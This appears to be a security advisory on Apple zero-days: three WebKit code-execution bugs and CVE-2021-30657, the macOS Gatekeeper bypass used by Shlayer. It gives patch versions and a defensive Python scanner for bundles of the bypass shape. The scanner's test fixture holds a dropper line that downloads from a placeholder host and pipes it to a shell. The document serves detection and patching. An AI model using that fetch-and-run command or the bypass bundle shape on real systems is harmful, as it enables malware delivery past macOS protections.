Active Exploitation of Apple Zero-Day Vulnerabilities

A recently patched zero-day, tracked as CVE-2021-30657, enables client-side attacks in which downloaded malware runs despite macOS's built-in checks, and it has been exploited in the wild by the Shlayer malware family.
Published on July 14, 2021
Updated on April 19, 2023
Advisory Type  Vulnerability Intelligence
CVE ID  CVE-2021-30657, CVE-2021-30663, CVE-2021-30665, CVE-2021-30666
Vulnerability Type  Remote Code Execution [RCE] (CVE-2021-30663, CVE-2021-30665, CVE-2021-30666); Security Bypass (CVE-2021-30657)
Vulnerable Application  Apple WebKit browser engine (CVE-2021-30663, CVE-2021-30665, CVE-2021-30666); macOS File Quarantine / Gatekeeper / Notarization checks (CVE-2021-30657)
Affected Platform  iOS / macOS / watchOS

Executive Summary

Adversaries are actively exploiting zero-day vulnerabilities in Apple platforms. According to Apple's security advisories, three critical bugs exist in WebKit, the browser rendering engine used by Safari and by every other application that renders HTML on iOS (where third-party browsers must use WebKit as well). Apple states these bugs may have been actively exploited; when triggered by crafted web content they lead to remote code execution on the affected device. A separate, recently patched zero-day, CVE-2021-30657, affects macOS rather than WebKit: it lets a downloaded application run without passing Apple's File Quarantine, Gatekeeper and Notarization checks, and it has been exploited in the wild by the Shlayer malware family.

Threat Vector

The WebKit bugs (CVE-2021-30663, CVE-2021-30665, CVE-2021-30666) are triggered when the victim visits a malicious website hosted by the threat actor; no further interaction is required beyond rendering the page. CVE-2021-30657 is triggered when the victim downloads and opens a malicious application bundle, since the bug lies in the checks macOS applies to downloaded (quarantined) apps.

CVE             Type                       Description
CVE-2021-30663  Integer overflow / RCE     An integer overflow in WebKit; processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30665  Memory corruption / RCE    A memory corruption issue in WebKit; processing maliciously crafted web content may lead to arbitrary code execution
CVE-2021-30666  Buffer overflow / RCE      A buffer overflow in WebKit; processing maliciously crafted web content may lead to arbitrary code execution
Active malware campaigns targeting Apple 0-days

CVE             Type             Description
CVE-2021-30657  Security bypass  Bypasses Apple's File Quarantine, Gatekeeper and Notarization security checks [macOS]

Shlayer Malware
Apple patched CVE-2021-30657, a macOS zero-day exploited in the wild by Shlayer malware to bypass Apple's File Quarantine, Gatekeeper and Notarization security checks and then download second-stage malicious payloads. The flaw is a logic bug rather than memory corruption: an app bundle whose main executable is a script and which ships no Info.plist was not classified as a bundle by the system policy daemon, so the quarantine and notarization assessment that normally blocks unsigned downloaded apps was never applied and the script ran on double-click as if it had been approved.
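As an added example (not code from the advisory, from Apple or from Shlayer), the Python script below scans a directory tree for .app bundles shaped like the public CVE-2021-30657 trigger. It assumes the publicly documented bypass shape: a main executable under Contents/MacOS that is a script (begins with "#!") inside a bundle that has no Contents/Info.plist. The bundle names, the script bodies and the placeholder URL in the sample are constructed test data. A hit is a lead for manual review on a real Mac (for example spctl --assess --type execute on the bundle and xattr -p com.apple.quarantine on its executable), not proof of malware, since legitimate script-based apps exist; those normally carry an Info.plist and are therefore not flagged here.

```python
"""Heuristic scan for .app bundles shaped like the CVE-2021-30657 trigger.

Added example, not part of the advisory. Assumption: the bypass shape is a
bundle whose Contents/MacOS executable is a script and which has no
Contents/Info.plist, so syspolicyd did not treat it as a bundle and skipped
the File Quarantine / Gatekeeper / Notarization assessment.
"""
import os
import tempfile
from pathlib import Path


def is_script(path):
    """True if the file begins with a shebang, i.e. is a shell/Python/... script."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False


def assess_bundle(bundle):
    """Collect the two indicators for one .app bundle (a pathlib.Path)."""
    contents = bundle / "Contents"
    macos_dir = contents / "MacOS"
    executables = sorted(p for p in macos_dir.iterdir() if p.is_file()) if macos_dir.is_dir() else []
    script_execs = [p.name for p in executables if is_script(p)]
    has_plist = (contents / "Info.plist").is_file()
    return {
        "bundle": bundle.name,
        "has_info_plist": has_plist,
        "script_executables": script_execs,
        # Documented CVE-2021-30657 shape: script executable AND no Info.plist.
        "suspicious": bool(script_execs) and not has_plist,
    }


def scan(root):
    """Walk `root` and assess every directory named *.app, nested ones included."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            if name.endswith(".app"):
                findings.append(assess_bundle(Path(dirpath) / name))
    return findings


def build_sample(root):
    """Constructed sample data: three bundles, only the first has the bypass shape."""
    root = Path(root)
    # 1. Dropper-style bundle: bash script as the main executable, no Info.plist.
    bad = root / "Installer.app" / "Contents" / "MacOS"
    bad.mkdir(parents=True)
    (bad / "Installer").write_bytes(b"#!/bin/bash\ncurl -fsSL http://example.invalid/stage2 | sh\n")
    # 2. Ordinary app: Mach-O executable (CF FA ED FE magic) plus Info.plist.
    good = root / "Signed.app" / "Contents"
    (good / "MacOS").mkdir(parents=True)
    (good / "MacOS" / "Signed").write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 28)
    (good / "Info.plist").write_text(
        "<plist><dict><key>CFBundleIdentifier</key><string>com.example.signed</string></dict></plist>")
    # 3. Script-based app that ships an Info.plist: a real bundle, assessed normally.
    scripted = root / "Scripted.app" / "Contents"
    (scripted / "MacOS").mkdir(parents=True)
    (scripted / "MacOS" / "Scripted").write_bytes(b"#!/bin/sh\necho hi\n")
    (scripted / "Info.plist").write_text("<plist><dict></dict></plist>")


def demo():
    """Build the constructed sample in a temp dir, scan it, return findings by bundle name."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return {f["bundle"]: f for f in scan(tmp)}


if __name__ == "__main__":
    for name, f in sorted(demo().items()):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {name}  Info.plist={f['has_info_plist']}  scripts={f['script_executables']}")
```

To scan a real download folder, call scan(Path.home() / "Downloads") instead of demo(); the heuristic deliberately does not prune nested bundles, since a helper app embedded in a larger bundle could have the same shape.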

Impact and Mitigation

Impact

  • RCE through the WebKit bugs gives the attacker unauthorized access to the target device's operating system and file system, leading to compromise of user data.
  • Attackers gain arbitrary code execution on the victim device, compromising control of the device and its security.
  • The security bypass lets malware run by sidestepping the protections built into the device; CVE-2021-30657 specifically lets an unsigned, un-notarized downloaded app launch without any Gatekeeper prompt.

Mitigation

For CVE-2021-30663 / CVE-2021-30665 / CVE-2021-30666:
  • Affected devices include:
    • iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)
    • Macs running macOS Big Sur
    • Apple Watch Series 3 and later
  • The bugs are patched in iOS 14.5.1, macOS Big Sur 11.3.1 and watchOS 7.4.1 (CVE-2021-30663 and CVE-2021-30665), and in iOS 12.5.3 for older devices that cannot run current iOS (CVE-2021-30666).
For CVE-2021-30657:
  • Apple fixed the bug in macOS Big Sur 11.3; Macs on earlier builds remain exposed until updated.
